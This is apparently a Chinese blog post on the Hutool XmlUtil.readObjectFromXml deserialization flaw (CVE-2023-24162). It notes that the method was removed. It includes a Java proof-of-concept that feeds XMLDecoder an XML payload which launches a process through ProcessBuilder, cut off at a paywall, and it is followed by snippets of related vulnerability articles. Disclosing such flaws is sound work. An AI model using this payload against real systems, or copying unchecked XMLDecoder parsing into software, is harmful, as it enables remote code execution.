IO之反序列化漏洞

最新推荐文章于 2024-10-02 11:29:37 发布
原创 最新推荐文章于 2024-10-02 11:29:37 发布 · 1k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #xml

hutool之XmlUtil反序列化漏洞

  • 同样存在漏洞的方法还有IoUtil.readObject方法,存在反序列化漏洞,这些方法的漏洞在JDK中本身就存在,而且JDK的做法是要求用户自行检查内容,作为工具类,这块没法解决。
  • hutool在新版本中把这个方法拿掉了
    • 【core 】 【重要】删除XmlUtil.readObjectFromXml方法,避免漏洞(issue#2855@Github)

问题描述

Hutool提供的XML实用程序类在使用XmlUtil.readObjectFromXml解析不受信任的XML字符串时可能容易受到远程代码执行的攻击

使用示例

    public static void main(String[] args) {
   
        InputSource inputSource = new InputSource(StrUtil.getReader("<java>\n" +
                "    <object class=\"java.lang.ProcessBuilder\">\n" +
                "        <array class=\"java.lang.String\" length=\"1\">\n" +
                "            <void index=\"0\">\n" +
                "                <string>calc</string>\n" +
                "            </void>\n" +
                "        </array>\n" +
                "        <void method=\"start\"></void>\n" +
                "    </object>\n" +
                "</java>\n"));
        Object result;
        XMLDecoder xmldec
最低0.47元/天 解锁文章
漏洞复现-hutool XML反序列化漏洞(CVE-2023-24162)
玄道的网安博客
08-12 943
Hutool 中的XmlUtil.readObjectFromXml方法直接封装调用XMLDecoder.readObject解析xml数据,当使用 readObjectFromXml 去处理恶意的 XML 字符串时会造成任意代码执行。在最新版的 hutool-all 没有用黑名单,而是直接移除了 readObjectFromXml方法cn.hutool.core.util.XmlUtil#readObjectFromXml(java.lang.String)当然这个地方也是可以通过读取文件来实现的。
Hutool资源消耗漏洞 CVE-2022-4565
INSBUG的博客
08-04 917
ZipBomb的原理是创建一个文件,该文件包含相同的符号并被压缩,由于文件包含了相同的信息,所以其压缩的文件会比自己小许多。对于无限长度的重复字节来说,使用DEFLATE 压缩算法的压缩器有接近1032的压缩率(压缩率=压缩前大小/压缩后大小),对于部分恶意构造的Zip,压缩比甚至能达到28000000:1,也就是说10MB的压缩文件最后能解压出281TB的文件。其中,参数含义依次为:用户,硬限制(1KB为单位),软限制(1KB为单位),索引节点的软限制,索引节点的硬限制,以及文件系统路径。
hutool XML反序列化漏洞(CVE-2023-24162)
蚁景网安学院
03-06 1246
漏洞简介:Hutool 中的XmlUtil.readObjectFromXml方法直接封装调用XMLDecoder.readObject解析xml数据,当使用 readObjectFromXml 去处理恶意的 XML 字符串时会造成任意代码执行。
Hutool 路径遍历漏洞 CVE-2018-17297
INSBUG的博客
07-28 524
创建File对象的时候会调用checkSlip函数,该函数会通过获取传入文件的规范路径来消除路径的冗余和符号链接,然后检查file的规范路径是否以parentFile的规范路径开头,如果不是,则说明file不在parentFile目录下,将抛出异常;这是一种安全性检查,以确保文件在指定的父目录下,防止越界访问。该漏洞在权限设置不当的情况下可以实现任意文件覆盖的效果,覆盖一些敏感文件如/etc/passwd或ssh连接私钥,这样可能导致服务器被远程控制,并且在特定的情况下也可能造成远程命令执行。
Hutool证书验证漏洞 CVE-2022-22885
INSBUG的博客
08-25 860
修复后,如下图所示,在执行Https请求时,程序会自动校验hostname和从证书获取的主体名称。如此就不会遭受证书域名不匹配的不安全站点的攻击。该漏洞产生的原因在于Hutool HttpUtil的setInfo函数传入的hostNameVerfier默认的为TRUST_ANY_HOSTNAME_VERIFIER。若泄露的信息涉及密钥等可供验证的内容,会导致密钥对应设备被入侵。该库的HttpRequest类默认的HostnameVerifier信任所有的hostname,并不对服务器证书进行校验。
Java 入门指南:Java IO流 —— 序列化与反序列化
热带鱼的技术博客
08-27 1632
序列化是指将对象转换为字节流的过程,以便能够将其存储到文件、内存、网络传输等介质中,或者在不同的进程、网络或机器之间进行数据交换。 序列化的逆过程称为反序列化,即将字节流转换为对象。过反序列化,可以从存储介质或网络传输中读取数据,并重新构建对象。
Java序列化反序列化原理及漏洞解决方案
08-18
Java序列化反序列化原理及漏洞解决方案 Java序列化反序列化原理及漏洞解决方案是Java编程语言中的一项重要机制,该机制允许将Java对象转换为字节序列,以便在网络上传输或存储在文件中。同时,Java也提供了反序列化...
shiro反序列化工具,加强版
12-27
反序列化漏洞是由于程序在接收到网络传输的数据后,将其从二进制流恢复为对象时没有进行充分的验证和安全控制所导致的。当恶意用户能够控制这些数据时,他们可以构造特定的序列化对象,使得在反序列化过程中执行任意...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
反序列化是将已序列化的对象状态恢复为可操作对象的过程。在Java中,这个过程通常涉及到`java.io.ObjectInputStream`类,该类可以将字节流转换回Java对象。然而,如果反序列化的数据未经过适当的验证,恶意用户可能...
hutool工具包的json工具有漏洞
qq_58616732的博客
04-22 705
hutool工具包只能导入141条数据(不知道哪里有问题)阿里的fastjson能导入所有的199条数据。还是得用大厂的工具啊!在向es批量导入数据时。
hutool 解读(四)——工具类
weixin_44077623的博客
03-31 9152
字符串工具-StrUtil hasBlank、hasEmpty方法 这两个方法的区别是hasEmpty只判断是否为null或者空字符串(""),hasBlank则会把不可见字符也算做空,isEmpty和isBlank同理。 removePrefix、removeSuffix方法 这两个是去掉字符串的前缀后缀的,例如去个文件名的扩展名啥。 String fileName = StrUtil.removeSuffix("pretty_girl.jpg", ".jpg") //fileName
序列化与反序列化
胡振涛
08-06 192
序列化和和反序列化。作为学计算机的我来说刚刚接触到这两个词语。那么什么是序列化?什么是反序列化?序列化和反序列化的作用是什么呢?什么时候又会用到它们呢?一大波疑问扑面而来。 通俗一点的说,序列化就是把一个对象保存到一个文件或数据库字段中去。 反序列化就是在适当的时候把这个文件再转化成原来的对象使用。   当两个进程在进行远程通信时,彼此...
Web安全 - 文件上传漏洞(File Upload Vulnerability)
最新发布
小工匠
10-02 6444
文件上传漏洞是指Web应用允许用户上传文件,但没有对上传文件进行充分的验证和限制,导致攻击者可以上传恶意文件,如脚本、恶意代码等,进一步执行恶意操作。这种漏洞常见于文件管理、头像上传或文档管理等功能中。路径穿越结合文件上传:绕过文件上传目录限制,访问或执行敏感位置的文件。远程代码执行(RCE)结合文件上传:通过上传并执行恶意文件实现远程控制。跨站脚本(XSS)结合文件上传:通过文件传播恶意脚本,跨站点执行攻击。跨站请求伪造(CSRF)结合文件上传:在不知情的情况下诱使用户上传恶意文件。
CVE-2024-0738 Mldong ExpressionEngine RCE漏洞分析
shelter1234567的博客
01-23 1301
本次我们分析了CVE-2024-0738漏洞,运用模糊测试的思想挖掘了ExpressionUtil.eval的表达式注入漏洞,之后找到相关调用接口,构造恶意的参数。从而造成表达式的执行。至于ExpressionUtil.eval底层调用的机制,等下次分章再分析吧...欢迎大佬评论区留言,t=N7T8t=N7T8t=N7T8mldong: SpringBoot+Vue3快速开发平台、自研工作流引擎https://gitee.com/mldong/mldong。
开源项目hutool之zip_slip漏洞
weixin_30455067的博客
07-09 1180
今天突然看到了去年写的一篇漏洞分析文章,搬到博客上 ---------------- Hutool是Github上的一个开源项目,是一个java的工具包,对文件、流、加密解密、转码、正则、线程、XML等JDK方法进行封装,组成各种Util工具类,同时还提供一些其他的组件。目前在Github上已经有了2k+的Star。 Github地址:https://github.com/looly/hut...
推荐一个好用的Java工具类库Hutool
weixin_39309402的博客
12-04 2589
闲暇之余,打算整理一下自己所用的Util类,方便以后用,结果一个同事见到,就说整理这个干啥呀,推荐你一个好用的Java工具类库————Hutool,码云上一搜,这项目的确可以。如果懒得看源码,那我们先下载jar包,下载地址:https://download.youkuaiyun.com/download/weixin_39841882/11464665 下载好jar包以后,我们就做一个简单的小测试,先打开A...
Hutool-贼好用的Java工具类库
很多时候犯错都是在不知情的情况下发生的
06-30 4558
简介 Hutool是Hu + tool的自造词,前者致敬我的“前任公司”,后者为工具之意,谐音“糊涂”,寓意追求“万事都作糊涂观,无所谓失,无所谓得”的境界。 Hutool是一个Java工具包,也只是一个工具包,它帮助我们简化每一行代码,减少每一个方法,让Java语言也可以“甜甜的”。Hutool最初是我项目中“util”包的一个整理,后来慢慢积累并加入更多非业务相关功能,并广泛学习其它开源项目...
Java Hutool TriggerContainer介绍
奶萝卜的博客
02-28 579
Java Hutool TriggerContainer介绍 一.什么是TriggerContainer TriggerContainer是啥,自从Hutool从5.7.24版本后,增加了一个新的类。它就是TriggerContainer。 为啥把它叫做触发容器, 它的存在到底能解决哪些问题?相比其他容器它有哪些优势呢? 请不要着急,这还要从上周我遇到的那个需求说起,那可真不是一个美好的回忆。 二.业务介绍 为了讨论一些纯粹的技术,请容许我隐瞒一些业务细节,我将用最简单的话将清楚上周到底发生了什么。 那天,
Hutool之Http工具类使用踩坑
CodeManYang的博客
01-05 4054
Hutool之Http工具类使用踩坑 1.背景 近日需求对接,需要调用第三方接口,应接口文档要求,需要POST请求,采用Hutool的Http工具类进行调用。其中body内容是经过加密后的密文,在测试联调的时候发现,调用第三方接口,对方开发解密一直不成功,对比发送请求前的报文,自己去解密也能成功解密。考虑是否调用中发生了变化,一对比果然是对方接受到的密文和我加密的密文发生了变化,密文中存在/,然后去到对面就发生了转码,后续将Hutool的工具类换成其他的就可以成功调用 2.测试 为了验证是否是Hutool
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

摸魚散人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值